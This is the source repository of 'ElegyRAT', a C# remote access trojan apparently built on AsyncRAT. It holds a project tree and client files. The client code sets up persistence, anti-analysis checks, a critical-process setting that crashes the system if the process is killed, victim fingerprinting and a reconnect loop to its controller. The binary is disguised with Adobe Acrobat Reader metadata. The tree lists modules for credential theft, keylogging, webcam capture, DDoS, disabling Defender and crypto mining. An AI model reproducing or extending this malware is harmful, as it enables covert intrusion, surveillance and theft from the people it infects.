├── ElegyRAT-C-Sharp
├── Client
│ ├── 2.ico
│ ├── Algorithm
│ │ ├── Aes256.cs
│ │ └── Sha256.cs
│ ├── Client.csproj
│ ├── Client.csproj.user
│ ├── Connection
│ │ └── ClientSocket.cs
│ ├── Handle Packet
│ │ └── Packet.cs
│ ├── Helper
│ │ ├── Anti_Analysis.cs
│ │ ├── CheckMiner.cs
│ │ ├── HwidGen.cs
│ │ ├── IdSender.cs
│ │ ├── Methods.cs
│ │ ├── MutexControl.cs
│ │ ├── NativeMethods.cs
│ │ ├── ProcessCritical.cs
│ │ └── SetRegistry.cs
│ ├── ILMerge.props
│ ├── ILMergeOrder.txt
│ ├── Install
│ │ └── NormalStartup.cs
│ ├── Program.cs
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Settings.cs
│ ├── adobe_128px_1210214_easyicon.net.ico
│ ├── app.config
│ ├── app.manifest
│ └── packages.config
├── ElegyRAT-Sharp.sln
├── MessagePack
│ ├── MessagePack
│ │ ├── BytesTools.cs
│ │ ├── MsgPack.cs
│ │ ├── MsgPackType.cs
│ │ ├── ReadTools.cs
│ │ ├── WriteTools.cs
│ │ └── Zip.cs
│ ├── MessagePackLib.csproj
│ └── Properties
│ │ └── AssemblyInfo.cs
├── Plugin
│ ├── Chat
│ │ ├── Chat.sln
│ │ └── Chat
│ │ │ ├── Chat.csproj
│ │ │ ├── Connection.cs
│ │ │ ├── FormChat.Designer.cs
│ │ │ ├── FormChat.cs
│ │ │ ├── FormChat.resx
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── Extra
│ │ ├── Extra.sln
│ │ └── Extra
│ │ │ ├── Connection.cs
│ │ │ ├── Extra.csproj
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Handler
│ │ │ ├── HandleBlankScreen.cs
│ │ │ ├── HandleDisableDefender.cs
│ │ │ └── Wallpaper.cs
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── FileManager
│ │ ├── FileManager.sln
│ │ └── FileManager
│ │ │ ├── Connection.cs
│ │ │ ├── FileManager.csproj
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Handler
│ │ │ └── FileManager.cs
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ ├── TempSocket.cs
│ │ │ └── packages.config
│ ├── FileSearcher
│ │ ├── FileSearcher.sln
│ │ └── FileSearcher
│ │ │ ├── Connection.cs
│ │ │ ├── FileSearcher.csproj
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── LimeLogger
│ │ ├── LimeLogger.sln
│ │ └── LimeLogger
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── LimeLogger.csproj
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── Miscellaneous
│ │ ├── Miscellaneous.sln
│ │ └── Miscellaneous
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Handler
│ │ │ ├── HandleBotKiller.cs
│ │ │ ├── HandleDos.cs
│ │ │ ├── HandleLimeUSB.cs
│ │ │ ├── HandleShell.cs
│ │ │ ├── HandleTorrent.cs
│ │ │ └── HandlerExecuteDotNetCode.cs
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── IconLib.dll
│ │ │ ├── Miscellaneous.csproj
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ ├── AssemblyInfo.cs
│ │ │ ├── Resources.Designer.cs
│ │ │ └── Resources.resx
│ │ │ └── packages.config
│ ├── Options
│ │ ├── Options.sln
│ │ └── Options
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Handler
│ │ │ ├── HandlePcOptions.cs
│ │ │ ├── HandleReportWindow.cs
│ │ │ ├── HandleThumbnails.cs
│ │ │ ├── HandleUAC.cs
│ │ │ └── HandleUninstall.cs
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Methods.cs
│ │ │ ├── Options.csproj
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── ProcessManager
│ │ ├── ProcessManager.sln
│ │ └── ProcessManager
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── ProcessManager.csproj
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ └── packages.config
│ ├── Recovery
│ │ ├── Recovery.sln
│ │ └── Recovery
│ │ │ ├── Browsers
│ │ │ ├── Chromium
│ │ │ │ ├── Account.cs
│ │ │ │ ├── AesGcm.cs
│ │ │ │ ├── BCrypt.cs
│ │ │ │ ├── Chromium.cs
│ │ │ │ └── ChromiumCookies.cs
│ │ │ ├── CredentialModel.cs
│ │ │ ├── Firefox
│ │ │ │ ├── Cookies
│ │ │ │ │ └── FFCookiesGrabber.cs
│ │ │ │ ├── FFDecryptor.cs
│ │ │ │ ├── Firefox.cs
│ │ │ │ └── FirefoxPassReader.cs
│ │ │ ├── IPassReader.cs
│ │ │ └── SQLiteHandler.cs
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ ├── Recovery.csproj
│ │ │ └── packages.config
│ ├── RemoteCamera
│ │ ├── RemoteCamera.sln
│ │ └── RemoteCamera
│ │ │ ├── AForge
│ │ │ ├── Video.DirectShow
│ │ │ │ ├── CameraControlProperty.cs
│ │ │ │ ├── FilterInfo.cs
│ │ │ │ ├── FilterInfoCollection.cs
│ │ │ │ ├── Internals
│ │ │ │ │ ├── IAMCameraControl.cs
│ │ │ │ │ ├── IAMCrossbar.cs
│ │ │ │ │ ├── IAMStreamConfig.cs
│ │ │ │ │ ├── IAMVideoControl.cs
│ │ │ │ │ ├── IBaseFilter.cs
│ │ │ │ │ ├── ICaptureGraphBuilder2.cs
│ │ │ │ │ ├── ICreateDevEnum.cs
│ │ │ │ │ ├── IEnumFilters.cs
│ │ │ │ │ ├── IEnumPins.cs
│ │ │ │ │ ├── IFilterGraph.cs
│ │ │ │ │ ├── IFilterGraph2.cs
│ │ │ │ │ ├── IGraphBuilder.cs
│ │ │ │ │ ├── IMediaControl.cs
│ │ │ │ │ ├── IMediaEventEx.cs
│ │ │ │ │ ├── IPin.cs
│ │ │ │ │ ├── IPropertyBag.cs
│ │ │ │ │ ├── IReferenceClock.cs
│ │ │ │ │ ├── ISampleGrabber.cs
│ │ │ │ │ ├── ISampleGrabberCB.cs
│ │ │ │ │ ├── ISpecifyPropertyPages.cs
│ │ │ │ │ ├── Structures.cs
│ │ │ │ │ ├── Uuids.cs
│ │ │ │ │ └── Win32.cs
│ │ │ │ ├── PhysicalConnectorType.cs
│ │ │ │ ├── Uuids.cs
│ │ │ │ ├── VideoCapabilities.cs
│ │ │ │ ├── VideoCaptureDevice.cs
│ │ │ │ └── VideoInput.cs
│ │ │ └── Video
│ │ │ │ ├── IVideoSource.cs
│ │ │ │ └── VideoEvents.cs
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ ├── RemoteCamera.csproj
│ │ │ └── packages.config
│ ├── RemoteDesktop
│ │ ├── RemoteDesktop.sln
│ │ └── RemoteDesktop
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ ├── RemoteDesktop.csproj
│ │ │ ├── StreamLibrary
│ │ │ ├── Enums.cs
│ │ │ ├── IUnsafeCodec.cs
│ │ │ ├── IVideoCodec.cs
│ │ │ ├── UnsafeCodecs
│ │ │ │ └── UnsafeStreamCodec.cs
│ │ │ └── src
│ │ │ │ ├── JpgCompression.cs
│ │ │ │ ├── LzwCompression.cs
│ │ │ │ └── NativeMethods.cs
│ │ │ └── packages.config
│ ├── SendFile
│ │ ├── SendFile.sln
│ │ └── SendFile
│ │ │ ├── Connection.cs
│ │ │ ├── FodyWeavers.xml
│ │ │ ├── FodyWeavers.xsd
│ │ │ ├── Handler
│ │ │ ├── HandleMiner.cs
│ │ │ ├── HandleSendTo.cs
│ │ │ └── HandleUninstall.cs
│ │ │ ├── ILMerge.props
│ │ │ ├── ILMergeOrder.txt
│ │ │ ├── Methods.cs
│ │ │ ├── Packet.cs
│ │ │ ├── Plugin.cs
│ │ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ │ ├── SendFile.csproj
│ │ │ └── packages.config
│ └── SendMemory
│ │ ├── SendMemory.sln
│ │ └── SendMemory
│ │ ├── Connection.cs
│ │ ├── Handler
│ │ ├── HandleMiner.cs
│ │ └── HandleSendTo.cs
│ │ ├── ILMerge.props
│ │ ├── ILMergeOrder.txt
│ │ ├── Packet.cs
│ │ ├── Plugin.cs
│ │ ├── Properties
│ │ └── AssemblyInfo.cs
│ │ ├── SendMemory.csproj
│ │ ├── SendToMemory.cs
│ │ └── packages.config
├── ReadMe.txt
├── Server
│ ├── Algorithm
│ │ ├── Aes256.cs
│ │ ├── GetHash.cs
│ │ ├── Sha256.cs
│ │ └── Zip.cs
│ ├── App.config
│ ├── Connection
│ │ ├── Clients.cs
│ │ └── Listener.cs
│ ├── FodyWeavers.xml
│ ├── FodyWeavers.xsd
│ ├── Forms
│ │ ├── Form1.Designer.cs
│ │ ├── Form1.cs
│ │ ├── Form1.resx
│ │ ├── Form1.zip
│ │ ├── FormAbout.Designer.cs
│ │ ├── FormAbout.cs
│ │ ├── FormAbout.resx
│ │ ├── FormBlockClients.Designer.cs
│ │ ├── FormBlockClients.cs
│ │ ├── FormBlockClients.resx
│ │ ├── FormBuilder.Designer.cs
│ │ ├── FormBuilder.cs
│ │ ├── FormBuilder.resx
│ │ ├── FormCertificate.Designer.cs
│ │ ├── FormCertificate.cs
│ │ ├── FormCertificate.resx
│ │ ├── FormChat.Designer.cs
│ │ ├── FormChat.cs
│ │ ├── FormChat.resx
│ │ ├── FormDOS.Designer.cs
│ │ ├── FormDOS.cs
│ │ ├── FormDOS.resx
│ │ ├── FormDotNetEditor.Designer.cs
│ │ ├── FormDotNetEditor.cs
│ │ ├── FormDotNetEditor.resx
│ │ ├── FormDownloadFile.Designer.cs
│ │ ├── FormDownloadFile.cs
│ │ ├── FormDownloadFile.resx
│ │ ├── FormFileManager.Designer.cs
│ │ ├── FormFileManager.cs
│ │ ├── FormFileManager.resx
│ │ ├── FormFileSearcher.Designer.cs
│ │ ├── FormFileSearcher.cs
│ │ ├── FormFileSearcher.resx
│ │ ├── FormKeylogger.Designer.cs
│ │ ├── FormKeylogger.cs
│ │ ├── FormKeylogger.resx
│ │ ├── FormMiner.Designer.cs
│ │ ├── FormMiner.cs
│ │ ├── FormMiner.resx
│ │ ├── FormPassword.Designer.cs
│ │ ├── FormPassword.cs
│ │ ├── FormPassword.resx
│ │ ├── FormPorts.Designer.cs
│ │ ├── FormPorts.cs
│ │ ├── FormPorts.resx
│ │ ├── FormProcessManager.Designer.cs
│ │ ├── FormProcessManager.cs
│ │ ├── FormProcessManager.resx
│ │ ├── FormRemoteDesktop.Designer.cs
│ │ ├── FormRemoteDesktop.cs
│ │ ├── FormRemoteDesktop.resx
│ │ ├── FormSendFileToMemory.Designer.cs
│ │ ├── FormSendFileToMemory.cs
│ │ ├── FormSendFileToMemory.resx
│ │ ├── FormShell.Designer.cs
│ │ ├── FormShell.cs
│ │ ├── FormShell.resx
│ │ ├── FormTorrent.Designer.cs
│ │ ├── FormTorrent.cs
│ │ ├── FormTorrent.resx
│ │ ├── FormWebcam.Designer.cs
│ │ ├── FormWebcam.cs
│ │ └── FormWebcam.resx
│ ├── Handle Packet
│ │ ├── HandleChat.cs
│ │ ├── HandleDos.cs
│ │ ├── HandleFileManager.cs
│ │ ├── HandleKeylogger.cs
│ │ ├── HandleListView.cs
│ │ ├── HandleLogs.cs
│ │ ├── HandleMiner.cs
│ │ ├── HandlePing.cs
│ │ ├── HandleProcessManager.cs
│ │ ├── HandleRecovery.cs
│ │ ├── HandleRemoteDesktop.cs
│ │ ├── HandleReportWindow.cs
│ │ ├── HandleShell.cs
│ │ ├── HandleThumbnails.cs
│ │ ├── HandleWebcam.cs
│ │ ├── HandlerFileSearcher.cs
│ │ └── Packet.cs
│ ├── Helper
│ │ ├── AsyncTask.cs
│ │ ├── CreateCertificate.cs
│ │ ├── IconInjector.cs
│ │ ├── ListViewColumnSorter.cs
│ │ ├── ListviewDoubleBuffer.cs
│ │ ├── Methods.cs
│ │ └── ReferenceLoader.cs
│ ├── MessagePack
│ │ ├── BytesTools.cs
│ │ ├── MsgPack.cs
│ │ ├── MsgPackType.cs
│ │ ├── ReadTools.cs
│ │ └── WriteTools.cs
│ ├── Program.cs
│ ├── Properties
│ │ ├── AssemblyInfo.cs
│ │ ├── Resources.Designer.cs
│ │ ├── Resources.resx
│ │ ├── Settings.Designer.cs
│ │ └── Settings.settings
│ ├── RenamingObfuscation
│ │ ├── Classes
│ │ │ ├── Base64.cs
│ │ │ ├── ClassesRenaming.cs
│ │ │ ├── DecryptionHelper.cs
│ │ │ ├── FieldsRenaming.cs
│ │ │ ├── InjectHelper.cs
│ │ │ ├── MethodsRenaming.cs
│ │ │ ├── NamespacesRenaming.cs
│ │ │ ├── PropertiesRenaming.cs
│ │ │ └── Utils.cs
│ │ ├── EncryptString.cs
│ │ ├── Interfaces
│ │ │ ├── ICrypto.cs
│ │ │ └── IRenaming.cs
│ │ └── ModuleDefMD.cs
│ ├── Resources
│ │ ├── 7z.dll
│ │ ├── 7z.exe
│ │ ├── Fixer.bat
│ │ ├── IconExtractor.dll
│ │ ├── Miscellaneous.png
│ │ ├── arrow_down.png
│ │ ├── arrow_up.png
│ │ ├── blank-screen.png
│ │ ├── botkiller.png
│ │ ├── builder.png
│ │ ├── cGeoIp.dll
│ │ ├── chat.png
│ │ ├── client.png
│ │ ├── coding.png
│ │ ├── ddos.png
│ │ ├── disabled.png
│ │ ├── extra.png
│ │ ├── filemanager.png
│ │ ├── iconfinder_32_171485 (1).png
│ │ ├── info.png
│ │ ├── key.png
│ │ ├── keyboard-on.png
│ │ ├── keyboard.png
│ │ ├── logger.png
│ │ ├── monitoring-system.png
│ │ ├── mouse.png
│ │ ├── mouse_enable.png
│ │ ├── msgbox.png
│ │ ├── netstat.png
│ │ ├── pc.png
│ │ ├── play-button.png
│ │ ├── process.png
│ │ ├── remotedesktop.png
│ │ ├── report.png
│ │ ├── save-image.png
│ │ ├── save-image2.png
│ │ ├── server.png
│ │ ├── settings.png
│ │ ├── shell.png
│ │ ├── stop (1).png
│ │ ├── system.png
│ │ ├── tomem.png
│ │ ├── tomem1.png
│ │ ├── u-torrent-logo.png
│ │ ├── uac.png
│ │ ├── usb.png
│ │ ├── visit.png
│ │ ├── webcam.png
│ │ ├── xmr.png
│ │ └── xmrig.bin
│ ├── Server.csproj
│ ├── Settings.cs
│ ├── StreamLibrary
│ │ ├── Enums.cs
│ │ ├── IUnsafeCodec.cs
│ │ ├── IVideoCodec.cs
│ │ ├── UnsafeCodecs
│ │ │ └── UnsafeStreamCodec.cs
│ │ └── src
│ │ │ ├── JpgCompression.cs
│ │ │ ├── LzwCompression.cs
│ │ │ └── NativeMethods.cs
│ ├── app.manifest
│ ├── elegy_icon.ico
│ └── packages.config
└── clear.bat
├── LICENSE
├── README.md
├── README_CN.md
└── Start.png
/ElegyRAT-C-Sharp/Client/2.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Client/2.ico
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Algorithm/Sha256.cs:
--------------------------------------------------------------------------------
1 | using System.Security.Cryptography;
2 | using System.Text;
3 |
4 | namespace Client.Algorithm
5 | {
6 | public static class Sha256
7 | {
8 | public static string ComputeHash(string input)
9 | {
10 | byte[] data = Encoding.UTF8.GetBytes(input);
11 |
12 | using (SHA256Managed sha = new SHA256Managed())
13 | {
14 | data = sha.ComputeHash(data);
15 | }
16 |
17 | StringBuilder hash = new StringBuilder();
18 |
19 | foreach (byte _byte in data)
20 | hash.Append(_byte.ToString("X2"));
21 |
22 | return hash.ToString().ToUpper();
23 | }
24 |
25 | public static byte[] ComputeHash(byte[] input)
26 | {
27 | using (SHA256Managed sha = new SHA256Managed())
28 | {
29 | return sha.ComputeHash(input);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Client.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | publish\
5 |
6 |
7 |
8 |
9 |
10 | zh-CN
11 | false
12 |
13 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/CheckMiner.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Linq;
3 | using System.Management;
4 |
5 | namespace Client.Helper
6 | {
7 | class CheckMiner
8 | {
9 | public string GetProcess()
10 | {
11 | foreach (var process in Process.GetProcesses())
12 | {
13 | try
14 | {
15 | if (GetCommandLine(process).ToLower().Contains("--donate-level="))
16 | {
17 | SetRegistry.SetValue(Settings.Hwid, "1");
18 | return "1";
19 | }
20 | }
21 | catch { }
22 | }
23 | SetRegistry.SetValue(Settings.Hwid, "0");
24 | return "0";
25 | }
26 |
27 | public string GetCommandLine(Process process)
28 | {
29 | try
30 | {
31 | using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT CommandLine FROM Win32_Process WHERE ProcessId = " + process.Id))
32 | using (ManagementObjectCollection objects = searcher.Get())
33 | {
34 | return objects.Cast().SingleOrDefault()?["CommandLine"]?.ToString();
35 | }
36 | }
37 | catch { }
38 | return "";
39 | }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/HwidGen.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Security.Cryptography;
6 | using System.Text;
7 |
8 | namespace Client.Helper
9 | {
10 | public static class HwidGen
11 | {
12 | public static string HWID()
13 | {
14 | try
15 | {
16 | return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
17 | Environment.MachineName, Environment.OSVersion
18 | , new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
19 | }
20 | catch
21 | {
22 | return "Err HWID";
23 | }
24 | }
25 |
26 | public static string GetHash(string strToHash)
27 | {
28 | MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
29 | byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
30 | bytesToHash = md5Obj.ComputeHash(bytesToHash);
31 | StringBuilder strResult = new StringBuilder();
32 | foreach (byte b in bytesToHash)
33 | strResult.Append(b.ToString("x2"));
34 | return strResult.ToString().Substring(0, 20).ToUpper();
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/IdSender.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using Microsoft.VisualBasic.Devices;
3 | using System;
4 | using System.IO;
5 | using System.Windows.Forms;
6 |
7 | namespace Client.Helper
8 | {
9 | public static class IdSender
10 | {
11 | public static byte[] SendInfo()
12 | {
13 | MsgPack msgpack = new MsgPack();
14 | msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
15 | msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
16 | msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
17 | msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
18 | Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
19 | msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
20 | msgpack.ForcePathObject("Version").AsString = Settings.Version;
21 | msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
22 | msgpack.ForcePathObject("Performance").AsString = Methods.GetActiveWindowTitle();
23 | msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
24 | msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
25 | msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();
26 | msgpack.ForcePathObject("Pong").AsString = "";
27 | msgpack.ForcePathObject("Group").AsString = Settings.Group;
28 | return msgpack.Encode2Bytes();
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/MutexControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading;
6 |
7 | namespace Client.Helper
8 | {
9 | public static class MutexControl
10 | {
11 | public static Mutex currentApp;
12 | public static bool CreateMutex()
13 | {
14 | currentApp = new Mutex(false, Settings.MTX, out bool createdNew);
15 | return createdNew;
16 | }
17 | public static void CloseMutex()
18 | {
19 | if (currentApp != null)
20 | {
21 | currentApp.Close();
22 | currentApp = null;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/NativeMethods.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 | using System.Text;
6 |
7 | namespace Client.Helper
8 | {
9 | public static class NativeMethods
10 | {
11 | [DllImport("user32.dll")]
12 | public static extern IntPtr GetForegroundWindow();
13 | [DllImport("user32.dll")]
14 | public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
15 |
16 |
17 | [DllImport("kernel32.dll")]
18 | public static extern IntPtr GetModuleHandle(string lpModuleName);
19 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
20 | public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
21 |
22 | [DllImport("kernel32.dll", SetLastError = true)]
23 | public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
24 | public enum EXECUTION_STATE : uint
25 | {
26 | ES_CONTINUOUS = 0x80000000,
27 | ES_DISPLAY_REQUIRED = 0x00000002,
28 | ES_SYSTEM_REQUIRED = 0x00000001
29 | }
30 |
31 | [DllImport("ntdll.dll", SetLastError = true)]
32 | public static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Helper/ProcessCritical.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32;
2 | using System;
3 | using System.Diagnostics;
4 | using System.Runtime.InteropServices;
5 | using System.Threading;
6 |
7 | namespace Client.Helper
8 | {
9 | public static class ProcessCritical
10 | {
11 |
12 | public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
13 | {
14 | if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
15 | Exit();
16 | }
17 | public static void Set()
18 | {
19 | try
20 | {
21 | SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding);
22 | Process.EnterDebugMode();
23 | Helper.NativeMethods.RtlSetProcessIsCritical(1, 0, 0);
24 | }
25 | catch { }
26 | }
27 | public static void Exit()
28 | {
29 | try
30 | {
31 | NativeMethods.RtlSetProcessIsCritical(0, 0, 0);
32 | }
33 | catch
34 | {
35 | while (true)
36 | {
37 | Thread.Sleep(100000); //prevents a BSOD on exit failure
38 | }
39 | }
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Program.cs:
--------------------------------------------------------------------------------
1 | using System.Threading;
2 | using Client.Connection;
3 | using Client.Install;
4 | using System;
5 | using Client.Helper;
6 |
7 | /*
8 | │ Author : NYAN CAT
9 | │ Name : AsyncRAT Simple RAT
10 | │ Contact Me : https:github.com/NYAN-x-CAT
11 |
12 | This program is distributed for educational purposes only.
13 | */
14 |
15 | namespace Client
16 | {
17 | public class Program
18 | {
19 | public static void Main()
20 | {
21 | for (int i = 0; i < Convert.ToInt32(Settings.Delay); i++)
22 | {
23 | Thread.Sleep(1000);
24 | }
25 |
26 | if (!Settings.InitializeSettings()) Environment.Exit(0);
27 |
28 | try
29 | {
30 | if (!MutexControl.CreateMutex()) //if current payload is a duplicate
31 | Environment.Exit(0);
32 |
33 | if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment
34 | Anti_Analysis.RunAntiAnalysis();
35 |
36 | if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence]
37 | NormalStartup.Install();
38 |
39 | if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process
40 | ProcessCritical.Set();
41 |
42 | Methods.PreventSleep(); //prevent pc to idle\sleep
43 |
44 | }
45 | catch { }
46 |
47 | while (true) // ~ loop to check socket status
48 | {
49 | try
50 | {
51 | if (!ClientSocket.IsConnected)
52 | {
53 | ClientSocket.Reconnect();
54 | ClientSocket.InitializeClient();
55 | }
56 | }
57 | catch { }
58 | Thread.Sleep(5000);
59 | }
60 | }
61 | }
62 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Resources;
2 | using System.Reflection;
3 | using System.Runtime.CompilerServices;
4 | using System.Runtime.InteropServices;
5 |
6 | // General Information about an assembly is controlled through the following
7 | // set of attributes. Change these attribute values to modify the information
8 | // associated with an assembly.
9 | [assembly: AssemblyTitle("Adobe Acrobat Reader DC")]
10 | [assembly: AssemblyDescription("Adobe Acrobat Reader DC")]
11 | [assembly: AssemblyConfiguration("")]
12 | [assembly: AssemblyCompany("Adobe Systems Incorporated")]
13 | [assembly: AssemblyProduct("Adobe Acrobat Reader DC")]
14 | [assembly: AssemblyCopyright("Copyright 1984-2020 Adobe Systems Incorporated and its licensors. All rights reserved.")]
15 | [assembly: AssemblyTrademark("")]
16 | [assembly: AssemblyCulture("")]
17 |
18 | // Setting ComVisible to false makes the types in this assembly not visible
19 | // to COM components. If you need to access a type in this assembly from
20 | // COM, set the ComVisible attribute to true on that type.
21 | [assembly: ComVisible(false)]
22 |
23 | // The following GUID is for the ID of the typelib if this project is exposed to COM
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("20.13.20074.41169")]
36 | [assembly: AssemblyFileVersion("20.13.20074.41169")]
37 | [assembly: NeutralResourcesLanguage("en-US")]
38 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/adobe_128px_1210214_easyicon.net.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Client/adobe_128px_1210214_easyicon.net.ico
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
